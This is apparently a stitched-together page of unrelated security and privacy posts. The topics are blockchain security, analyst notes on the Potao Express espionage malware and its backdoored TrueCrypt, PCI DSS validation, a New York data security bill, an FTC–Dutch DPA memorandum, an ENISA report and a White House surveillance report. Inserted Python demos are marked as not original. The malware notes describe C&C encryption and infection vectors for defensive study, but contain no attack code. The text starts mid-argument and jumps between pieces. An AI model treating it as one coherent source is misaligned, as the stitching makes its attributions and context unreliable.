Realizing this potential, global investment banks are beginning to develop public and private blockchain technology standards and protocols, with a goal of re-imagining their daily operations within the global financial system. While the possibilities for financial innovation – shared ledgers and smart contracts to name a few – are dizzying, it is important to remember one thing: the speed and extent of acceptance of blockchain technology within the global financial services community will ultimately depend on the security of the network. Earlier this year, Interpol reported that blockchain can be repurposed by hackers to export malware to all computers in the network. Interpol proved this by introducing a proof-of-concept malware that showed the viability of such a cyber-attack. In the event of an actual attack, blockchain’s virtues, such as decentralization and immutability, would instantly become vices, as the malware would spread far and wide and the pollution would not be easily erased.

The intermediary functions described above are currently critical actions within global financial services, particularly in relation to financial asset trading; however, these activities are increasingly expensive, inefficient and, most dangerous of all, risky. They are expensive because the information technology investment and maintenance costs are significant. They are inefficient because although trading is swift for many financial assets, settlement is not, with too much reliance on back office human agency and duplication of effort and systems. They are risky because settlement delay introduces counterparty risk, and data concentration on centralized servers introduces operational/systems risk. In short, they are increasingly capital-intensive activities in the post-Credit Crisis milieu, where despite muted trading revenue, the demands of regulators grow louder for more transparent reporting and real-time risk exposure recordkeeping.

What, then, is blockchain technology? It’s a decentralized ledger of digital asset ownership on which the asset owners, or users, can initiate transfer to other users whose interconnected computers run blockchain software (“nodes”). The transactions themselves are encrypted transfer data that, when confirmed (in batches, roughly every ten minutes), comprise the “blocks” and when linked sequentially to the referenced prior block, comprise the “chain.” Confirmation occurs when the first of these nodes, each of which maintains a current copy of the blockchain, verifies the transaction(s) by utilizing specialized computational software to solve a complicated encryption problem. Then, and only then, does this node add the new block sequentially into the chain, causing the other nodes to validate the solution and update their ledgers accordingly. This verification yields compensation (e.g., in bitcoins or other cryptocurrency) to the problem-solving node, a “miner”, for the processing power expended in first successfully confirming the transaction.

Blockchain is thus both a secure means of digitized asset transfer and a virtually incorruptible record of such transfer, confirmed by processing power consensus and protected by ledger distribution, from the original “genesis” block all the way through the current transaction. A technology that can automate trust in the transfer for value of digitized assets poses an existential threat to the financial institutions that choose to ignore it. However, blockchain offers an opportunity for collaboration and co-development – creative construction rather than destruction – for financial institutions and other market participants that choose to embrace it, for the technology is an elegant response to each of the challenges mentioned above. Distributed ledgers reduce cost and risk and, through secure consensus verification, increase data integrity. Third party disintermediation and the prospect for near real-time settlement increase efficiency.
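The linking and confirmation mechanism described above, as an added Python example that is not part of the original post: every block commits to the hash of its predecessor and carries a proof of work (in Bitcoin the “complicated problem” a miner solves is a hash puzzle of this kind), so altering one recorded transfer invalidates every later block unless all of them are re-mined. The transfer strings and the difficulty are constructed for illustration.

```python
import hashlib
import json
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Block:
    index: int
    prev_hash: str   # hash of the preceding block: this is the "chain" link
    data: str        # the batch of transfers this block confirms
    nonce: int       # the proof-of-work solution found by the miner
    hash: str        # SHA-256 of the four fields above


def block_hash(index: int, prev_hash: str, data: str, nonce: int) -> str:
    """SHA-256 over a canonical serialization of the block's fields."""
    payload = json.dumps([index, prev_hash, data, nonce], separators=(",", ":"))
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def mine(index: int, prev_hash: str, data: str, difficulty: int) -> Tuple[int, str]:
    """Proof of work: search for a nonce whose block hash starts with `difficulty` zero hex digits."""
    nonce = 0
    while True:
        digest = block_hash(index, prev_hash, data, nonce)
        if digest.startswith("0" * difficulty):
            return nonce, digest
        nonce += 1


class Ledger:
    """A minimal chain of blocks, starting from a genesis block."""

    def __init__(self, difficulty: int = 3) -> None:
        self.difficulty = difficulty
        self.blocks: List[Block] = []
        self._append(0, "0" * 64, "genesis")

    def _append(self, index: int, prev_hash: str, data: str) -> str:
        nonce, digest = mine(index, prev_hash, data, self.difficulty)
        self.blocks.append(Block(index, prev_hash, data, nonce, digest))
        return digest

    def add(self, data: str) -> str:
        """Confirm a new batch of transfers and link it to the current tip of the chain."""
        tip = self.blocks[-1]
        return self._append(tip.index + 1, tip.hash, data)

    def first_invalid(self) -> Optional[int]:
        """Index of the first block that fails verification, or None if the ledger is intact.

        A block is valid when its stored hash matches its contents, the hash satisfies
        the proof-of-work target, and its prev_hash equals the previous block's hash.
        """
        for i, b in enumerate(self.blocks):
            recomputed = block_hash(b.index, b.prev_hash, b.data, b.nonce)
            if recomputed != b.hash or not recomputed.startswith("0" * self.difficulty):
                return i
            if i > 0 and b.prev_hash != self.blocks[i - 1].hash:
                return i
        return None


if __name__ == "__main__":
    ledger = Ledger(difficulty=3)
    ledger.add("alice -> bob: 5 units")      # constructed sample transfers
    ledger.add("bob -> carol: 2 units")
    print("intact ledger, first invalid block:", ledger.first_invalid())
    ledger.blocks[1].data = "alice -> bob: 500 units"  # tamper with a confirmed record
    print("after tampering, first invalid block:", ledger.first_invalid())
```

Re-mining only the altered block does not help: its new hash no longer matches the `prev_hash` stored in the block after it, so the tampering is still detected one block later.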

Blockchain’s potential for disruptive innovation within the financial services industry and beyond is great. It will be greater still if network security remains foremost in mind.

Potao Express samples

http://www.welivesecurity.com/2015/07/30/operation-potao-express/

http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf

TL;DR

2011 to July 2015
  • Aka Sapotao and node69
  • Group: Sandworm / Quedagh APT
  • Vectors: USB, exe disguised as doc or xls
  • Victims: RU, BY, AM, GE
  • Victims: MMM group, UA gov
  • truecryptrussia.ru has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor, to selected targets.
  • Win32/FakeTC: data theft from encrypted drives
  • The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented as downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
  • 1st: Full Plugin, with an export function called Plug. Full plugins run continuously until the infected system is restarted.
  • 2nd: Light Plugin, with an export function called Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
  • Some of the plugins were signed with a certificate issued to “Grandtorg”.
  • Traffic:
  • Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
  • The MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
  • After receiving the request, the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key.
  • In the 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
  • The actual data exchange after the key exchange is then encrypted with the AES-256 key, using symmetric cryptography because it is faster.
  • The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, malware version, computer name, current privileges, OS architecture (64- or 32-bit) and also the name of the current process.
  • Potao USB: uses social engineering, an exe in the root of the drive disguised as the drive icon
  • Potao Anti-RE: uses the MurmurHash2 algorithm for computing the hashes of the API function names.
  • Potao Anti-RE: encryption of strings
  • Russian TrueCrypt Win32/FakeTC: The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
  • IOC: https://github.com/eset/malware-ioc/tree/master/potao
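Because Potao stores API names only as MurmurHash2 values (see the Anti-RE note above), an analyst recovering the import table has to hash candidate names and look the values up. The following Python is an added analyst helper, not code from ESET’s report or from the malware: it implements 32-bit MurmurHash2 and builds a hash-to-name table to resolve hashes pulled from a sample. The seed Potao uses is not given on this page, so `seed=0` is a placeholder, and the API name list is a constructed sample (a real table would be generated from the DLLs’ export lists).

```python
import struct
from typing import Dict, Iterable

# Constructed sample of Win32 API names; a real table would cover whole DLL export lists.
SAMPLE_API_NAMES = [
    "CreateFileA", "CreateFileW", "ReadFile", "WriteFile", "GetProcAddress",
    "LoadLibraryA", "VirtualAlloc", "CreateThread", "InternetOpenA",
    "HttpSendRequestA", "CryptAcquireContextA", "FindFirstFileW",
]

MURMUR_M = 0x5BD1E995   # multiplier from the original MurmurHash2
MURMUR_R = 24           # rotation amount from the original MurmurHash2
MASK32 = 0xFFFFFFFF


def murmurhash2(data: bytes, seed: int = 0) -> int:
    """32-bit MurmurHash2 (Austin Appleby's original), 4-byte little-endian blocks."""
    length = len(data)
    h = (seed ^ length) & MASK32
    nblocks = length // 4
    # Mix the body four bytes at a time.
    for (k,) in struct.iter_unpack("<I", data[: nblocks * 4]):
        k = (k * MURMUR_M) & MASK32
        k ^= k >> MURMUR_R
        k = (k * MURMUR_M) & MASK32
        h = (h * MURMUR_M) & MASK32
        h ^= k
    # Fold in the 1..3 trailing bytes (mirrors the fall-through switch in the C code).
    tail = data[nblocks * 4:]
    if len(tail) == 3:
        h ^= tail[2] << 16
    if len(tail) >= 2:
        h ^= tail[1] << 8
    if len(tail) >= 1:
        h ^= tail[0]
        h = (h * MURMUR_M) & MASK32
    # Final avalanche.
    h ^= h >> 13
    h = (h * MURMUR_M) & MASK32
    h ^= h >> 15
    return h


def build_table(names: Iterable[str], seed: int = 0) -> Dict[int, str]:
    """Map MurmurHash2(name) -> name so that hashes found in a sample can be resolved."""
    table: Dict[int, str] = {}
    for name in names:
        h = murmurhash2(name.encode("ascii"), seed)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision between {name!r} and {table[h]!r}")
        table[h] = name
    return table


def resolve(hashes: Iterable[int], table: Dict[int, str]) -> Dict[int, str]:
    """Resolve 32-bit hashes recovered from a sample; unknown values map to '?'."""
    return {h: table.get(h, "?") for h in hashes}


if __name__ == "__main__":
    table = build_table(SAMPLE_API_NAMES, seed=0)   # seed 0 is a placeholder, see lead-in
    # Constructed "recovered" hashes: two known names and one value not in the table.
    seen = [murmurhash2(b"LoadLibraryA"), murmurhash2(b"VirtualAlloc"), 0xDEADBEEF]
    for h, name in resolve(seen, table).items():
        print(f"{h:08x}  {name}")
```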


PCI Security Standards Council Releases Enhanced Validation Requirements for Designated Entities as PCI DSS Version 3.0 Set to Retire

Earlier this month, the Payment Card Industry Security Standards Council (“PCI SSC”) published a set of enhanced validation procedures designed to provide greater assurance that certain entities are maintaining compliance with the PCI Data Security Standard (“PCI DSS”) effectively and on a continuing basis. The payment card brands and acquirers will determine which organizations are required to undergo a compliance assessment with respect to these supplemental validation requirements, which are entitled the PCI DSS Designated Entities Supplemental Validation (“DESV”).

The DESV complements the PCI DSS and contains additional security control requirements that are organized into the following five control areas:

  1. Implement a PCI DSS compliance program;
  2. Document and validate PCI DSS scope;
  3. Validate that PCI DSS is incorporated into business-as-usual activities;
  4. Control and manage logical access to the cardholder data environment; and
  5. Identify and respond to suspicious events.

Those entities designated by the card brands for validation against the DESV must comply with the requirements set forth in the five control areas, which include, for example, increased administrative, validation and scoping controls. Entities that may be subject to the DESV include, for example, entities that (1) store, process or transmit large volumes of cardholder data; (2) provide aggregation points for cardholder data; or (3) have suffered significant or repeated breaches of cardholder data. According to the PCI SSC, the supplemental validation process typically will be performed in conjunction with the entity’s full PCI DSS assessment.

The release of the DESV coincides with the retirement of PCI DSS Version 3.0 on June 30, 2015. Although its replacement, Version 3.1, contains mostly minor updates and clarifications, the new version notably updates the standard’s encryption requirements to clarify that Secure Sockets Layer (“SSL”) and early Transport Layer Security (“TLS”) are not considered strong cryptography, and therefore will no longer be PCI DSS-compliant encryption protocols as of June 30, 2016. The migration from SSL to newer versions of TLS comes after several vulnerabilities were found to be associated with SSL, leading the National Institute of Standards and Technology to deem SSL as an unacceptable encryption protocol for the protection of data. In addition to the retirement of Version 3.0, the controls that Version 3.0 designated initially as best practices will now become PCI DSS requirements as of July 1, 2015.

Data Security Act Introduced in New York State Assembly

On April 8, 2015, a New York Assemblyman introduced the Data Security Act in the New York State Assembly that would require New York businesses to implement and maintain information security safeguards. The requirements would apply to “private information,” which is defined as either:

  • personal information consisting of any information in combination with one or more of the following data elements, when either the personal information or the data element is not encrypted: Social Security number; driver’s license number or non-driver identification card number; financial account or credit or debit card number in combination with any required security code or password; or biometric information;
  • a user name or email address in combination with a password or security question and answer that would permit access to an online account; or
  • unsecured protected health information (as that term is defined in the Health Insurance Portability and Accountability Act of 1996 (“HIPAA”) Privacy Rule).

The Data Security Act obligates entities to develop an information security program that includes:

  • administrative safeguards, such as conducting risk assessments, training employees and selecting service providers capable of maintaining appropriate safeguards;
  • technical safeguards, such as assessing risks in network and software design and regularly testing and monitoring the effectiveness of key controls; and
  • physical safeguards, such as disposing of electronic media so that the information cannot be read or reconstructed.

The Data Security Act deems certain specific entities in compliance with the law’s requirements, such as financial institutions that comply with the Gramm-Leach-Bliley Act, HIPAA-regulated entities, and entities that comply with NIST Standards. Entities that comply with the latest version of NIST Special Publication 800-53 are also immune from any civil liability under the Act.

The Data Security Act establishes a rebuttable presumption that an entity that obtains an independent third party certification complies with the requirements of the law. The New York Attorney General is empowered to enjoin any violations of the Data Security Act, and can obtain civil penalties of $250 for each person whose private information was compromised, up to a maximum of $10 million. For knowing and reckless violations, these amounts can increase to $1,000 for each affected person up to a total of the higher of $50 million or three times the aggregate amount of any actual costs and losses.

The Data Security Act also amends New York’s breach notification law by using the expanded definition of “private information” discussed above. Previously, New York’s law did not cover breaches involving biometric information, user names and passwords, or protected health information.

FTC Enters into Memorandum of Understanding with Dutch Data Protection Authority

On March 9, 2015, the Federal Trade Commission announced that it has entered into a Memorandum of Understanding (the “Memorandum”) with the Dutch Data Protection Authority (the “Dutch DPA”).

The Memorandum, which does not create legally binding obligations on the FTC or the Dutch DPA, focuses on the following five objectives:

  • cooperating when enforcing applicable privacy laws such as the FTC Act and the Dutch Data Protection Act, including sharing relevant information about complaints;
  • facilitating research and education about how to protect personal information;
  • aiding the mutual exchange of knowledge and expertise between the two entities via training programs and staff exchanges;
  • promoting the understanding of economic and legal conditions and theories that impact the enforcement of applicable privacy laws; and
  • informing each other of privacy-related developments in their respective countries.

The Memorandum describes specific procedures that the FTC and the Dutch DPA will take to achieve these objectives and notes that each country has the discretion to decide whether to provide assistance to the other on a given privacy-related matter. The Memorandum also discusses protective measures for transmitting information related to a request for assistance on a privacy-related matter, such as encryption or maintaining materials in secured, restricted locations.

In announcing the Memorandum, FTC Chairwoman Edith Ramirez emphasized the importance of cross-border cooperation and stated that “[t]his arrangement with our Dutch counterpart will strengthen FTC efforts to protect the privacy of consumers on both sides of the Atlantic.” Similarly, her counterpart, Chairman of the Dutch DPA Jacob Kohnstamm, noted that entering into the Memorandum marked a great step in efforts to increase cooperation among “data protection and privacy authorities across the globe,” which is especially important “[i]n this day and age of increasing cross-border data flows.”

The Memorandum is similar to those previously entered into by the FTC with the UK Information Commissioner’s Office in March 2014 and the Office of the Data Protection Commissioner of Ireland in June 2013.

ENISA Issues Report on Implementation of Privacy and Data Protection by Design

On January 12, 2015, the European Union Agency for Network and Information Security (“ENISA”) published a report on Privacy and Data Protection by Design – from policy to engineering (the “Report”). The “privacy by design” principle emphasizes the development of privacy protections at the early stages of the product or service development process, rather than at later stages. Although the principle has found its way into some proposed legislation (e.g., the proposed EU General Data Protection Regulation), its concrete implementation remains presently unclear. Hence, the Report aims to promote a discussion on how the principle can be implemented concretely and effectively with the help of engineering methods.

The Report provides an overview of the ways in which businesses have built the “privacy by design” principle into their products and services. To this end, the Report reviews existing approaches and strategies for implementing privacy by design, and gives a structured overview of twelve important privacy techniques (such as authentication, attribute-based credentials, encrypted communications, anonymity and pseudonymity, etc.). Further, the Report presents the challenges and limitations of “by-design” principles for privacy and data protection.

The Report concludes with a number of recommendations that address system developers, service providers, data protection authorities (“DPAs”) and policy makers on how to overcome and mitigate these limits. The main recommendations include:

  • Policymakers should support the development of new incentive mechanisms for privacy-friendly services and need to promote them (e.g., the establishment of audit schemes and seals to enable the customer to make informed choices and the establishment of penalties for those who do not care or obstruct privacy-friendly solutions);
  • The research community should further investigate privacy engineering, especially with a multidisciplinary approach;
  • Software developers and the research community should offer tools that enable the intuitive implementation of privacy properties. These tools should integrate freely available and maintained components with open interfaces and application programming interfaces;
  • DPAs should play an important role in providing independent guidance and assessing modules and tools for privacy engineering, such as in the promotion of privacy-enhancing technologies and the implementation of the transparency principle;
  • Legislators should promote privacy and data protection in the norms they adopt, building on the European legal data protection framework; and
  • Standardization bodies should include privacy considerations in the standardization process as part of international standards, and should develop standards for the interoperability of privacy features in order to help users compare the privacy guarantees of different products and services and make compliance checks easier for DPAs.

View the full report.

What’s with the TrueCrypt warning?

TrueCrypt, the free open source full disk encryption program favoured by many security-savvy people, including apparently Edward Snowden, is no more. Its website now redirects to its SourceForge page which starts with this message: WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data […]

White House Publishes Report on Government Surveillance Programs

On December 18, 2013, the White House published a report recommending reforms to the federal government’s wide-ranging surveillance programs. The voluminous report, entitled “Liberty and Security in a Changing World,” was authored by The Review Group on Intelligence and Communications Technologies, an advisory panel that includes experts in national security, intelligence gathering and civil liberties.

The report begins by describing the varying goals of U.S. surveillance efforts, which range from defending national security to protecting the right to privacy to strengthening strategic alliances with other countries. The report then details 46 recommendations designed to balance these goals. Some notable recommendations include:

  • Establishing a general rule that the federal government should not collect and store “mass, undigested, non-public personal information about individuals to enable future queries and data-mining for foreign intelligence purposes”;
  • Increasing the transparency of the Foreign Intelligence Surveillance Court;
  • Applying the Privacy Act of 1974, which regulates the use and disclosure of personally identifiable information by federal agencies, to “both US persons and non-US persons”;
  • Increasing the use of encryption and urging U.S. companies to encrypt data in transit, at rest and in storage (including in the cloud); and
  • Creating a Civil Liberties and Privacy Protection Board to “oversee Intelligence Community activities for foreign intelligence purposes, rather than only for counterterrorism purposes.”

The report concludes by noting the rapid pace of technological development and emphasizing that the reforms advocated in the report are intended to “safeguard the privacy and dignity of American citizens, and to promote public trust, while also allowing the Intelligence Community to do what must be done to respond to genuine threats.”

Read the full report.